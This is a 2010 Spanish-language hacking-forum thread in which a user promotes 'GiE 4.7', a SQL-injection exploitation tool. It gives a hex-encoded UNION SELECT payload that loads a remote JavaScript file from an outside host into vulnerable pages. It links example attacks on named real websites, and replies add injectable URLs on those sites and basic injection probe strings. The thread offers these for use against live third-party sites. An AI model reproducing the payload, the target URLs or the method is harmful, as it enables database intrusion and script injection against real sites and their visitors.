elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  GiE 4.7 - MySQLi
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: GiE 4.7 - MySQLi  (Leído 7,036 veces)
Pony-Magic

Desconectado Desconectado

Mensajes: 36



Ver Perfil
GiE 4.7 - MySQLi
« en: 16 Marzo 2010, 19:02 pm »

GiE 4.7

No voy a escribir una descripción de que es la GiE, las nuevas características, etc, etc.
Simplemente voy a dejar el link de la VERSION 3.0 para el que quiera saber "que es".
De esta nueva version solo voy a poner algunos screens, links con ejemplos, el código de fuente y el código para insertarlo en cualquier SQLi.

  • Screens:


    explorador de bases de datos.


    lector de archivos, con Bruteforce.


    consola de peticiones, en la imagen un ejemplo
    de una query que busca mails en la base de datos.



    variables del servidor



    Historial de Inyecciones, para el que quiera
    saber un poco mas sobre el funcionamiento de la GIE





  • Ejemplos:

    SQLi GIE [adegasgalegas.es]
    SQLi GIE [rubias19.com]
    SQLi GIE [comic-ar.com]



  • Usarlo en cualqueir SQLi:

    En una SQLi, unis otro select y marcas las columnas ( id=-1 union select 1,2,3,4,5 )
    En un valor que printee (que se muestre en la web), simplemente copias y pegas el codigo de la GIE.

    Código:
    (0x3c736372697074207372633d22687474703a2f2f73696e64656c656e2e636c2f61646d696e2f75706c6f6164732f696d616765732f4769452e6a732220747970653d22746578742f6a617661736372697074223e3c2f7363726970743e)






« Última modificación: 16 Marzo 2010, 19:04 pm por Pony-Magic » En línea

tragantras


Desconectado Desconectado

Mensajes: 465


Ver Perfil
Re: GiE 4.7 - MySQLi
« Respuesta #1 en: 16 Marzo 2010, 21:37 pm »

como ya dije en DDR cada dia te superas^^

(aqui no se pueden dar puntos que si no... xD )
En línea

Colaboraciones:
1 2
alexkof158


Desconectado Desconectado

Mensajes: 415


LOL


Ver Perfil
Re: GiE 4.7 - MySQLi
« Respuesta #2 en: 16 Marzo 2010, 23:48 pm »

jodaaa ahora se hace mas facil el proceso de las inyecciones buen trabajo,  ;-)  probe algunas cosita pero no pude cancelar una peticion que hice con le bruteforce ...

Saludos

Edito...
Ponyc una preguntica casual como hicistes para saber que la pagina comic.ar era vulnerable a Injection sql o el que la sepa que tire el datico

saludos   ;D
« Última modificación: 16 Marzo 2010, 23:57 pm por alexkof158 » En línea

"noproxy"
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.720


$M


Ver Perfil WWW
Re: GiE 4.7 - MySQLi
« Respuesta #3 en: 17 Marzo 2010, 00:04 am »

... hicistes para saber que la pagina comic.ar era vulnerable a Injection sql o el que la sepa que tire el datico
Estás en las iSQL sin saber como es la identificación de sitios vulnerables?
En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
tragantras


Desconectado Desconectado

Mensajes: 465


Ver Perfil
Re: GiE 4.7 - MySQLi
« Respuesta #4 en: 17 Marzo 2010, 00:16 am »

jodaaa ahora se hace mas facil el proceso de las inyecciones buen trabajo,  ;-)  probe algunas cosita pero no pude cancelar una peticion que hice con le bruteforce ...

Saludos

Edito...
Ponyc una preguntica casual como hicistes para saber que la pagina comic.ar era vulnerable a Injection sql o el que la sepa que tire el datico

saludos   ;D

http://www.rubias19.com/elnoticiario/videos/index.php?id='



POr cierto ponymagic qué sentido tiene difuminar en todas las fotos la parte de la URL si te dejas una sin difuminar? jajaja fail xD
En línea

Colaboraciones:
1 2
alexkof158


Desconectado Desconectado

Mensajes: 415


LOL


Ver Perfil
Re: GiE 4.7 - MySQLi
« Respuesta #5 en: 17 Marzo 2010, 00:34 am »

jodaaa ahora se hace mas facil el proceso de las inyecciones buen trabajo,  ;-)  probe algunas cosita pero no pude cancelar una peticion que hice con le bruteforce ...

Saludos

Edito...
Ponyc una preguntica casual como hicistes para saber que la pagina comic.ar era vulnerable a Injection sql o el que la sepa que tire el datico

saludos   ;D

http://www.rubias19.com/elnoticiario/videos/index.php?id='



POr cierto ponymagic qué sentido tiene difuminar en todas las fotos la parte de la URL si te dejas una sin difuminar? jajaja fail xD

aclare http://comic-ar.com/entrada.php?Id=

saludos
En línea

"noproxy"
alexkof158


Desconectado Desconectado

Mensajes: 415


LOL


Ver Perfil
Re: GiE 4.7 - MySQLi
« Respuesta #6 en: 17 Marzo 2010, 00:36 am »

... hicistes para saber que la pagina comic.ar era vulnerable a Injection sql o el que la sepa que tire el datico
Estás en las iSQL sin saber como es la identificación de sitios vulnerables?
joder, obviamente que si se 1 and 1=1-- or 1 and 1=0-- o comillas simples y que tire error sql o algo asi ...  pero con comic.ar ninguna de estas funciona...ahora si entiendennn o me explico federicooo
En línea

"noproxy"
Pony-Magic

Desconectado Desconectado

Mensajes: 36



Ver Perfil
Re: GiE 4.7 - MySQLi
« Respuesta #7 en: 17 Marzo 2010, 00:43 am »

1) Disfumine por si Murder se quejaba, asi solamente quitaba las SQLi. ( Murder: el admin de diosdelared )
2) http://comic-ar.com/entrada.php?Id=86'
3) Agradeceria que comenten algo sobre el post en vez de discutir como diferenciar un modulo vulnerable a SQLi.
En línea

WHK
Moderador
***
Desconectado Desconectado

Mensajes: 6.576


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: GiE 4.7 - MySQLi
« Respuesta #8 en: 17 Marzo 2010, 03:00 am »

hola, está super bueno, me gustó.
En línea

- Telegram: @WHK102 - Website: https://yhojann.cl/
laideker

Desconectado Desconectado

Mensajes: 68


09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0


Ver Perfil WWW
Re: GiE 4.7 - MySQLi
« Respuesta #9 en: 6 Abril 2010, 04:00 am »

Buenisimo... Felicitaciones  ;-) ;-) ;-) ;-)
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
mysqli
Desarrollo Web
tecasoft 2 1,539 Último mensaje 24 Noviembre 2012, 20:47 pm
por tecasoft
¿Crear vistas temporales en php+mysqli ?
PHP
Psyke1 0 1,208 Último mensaje 21 Febrero 2013, 22:02 pm
por Psyke1
API MySQLi
PHP
:ohk<any> 0 1,454 Último mensaje 12 Noviembre 2013, 21:22 pm
por :ohk<any>
Error en PHP+MySqli
PHP
spysecurityca 6 2,154 Último mensaje 7 Mayo 2014, 04:52 am
por spysecurityca
mysqli error
Bases de Datos
jalbtercero 1 1,074 Último mensaje 6 Marzo 2016, 00:52 am
por jalbtercero
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines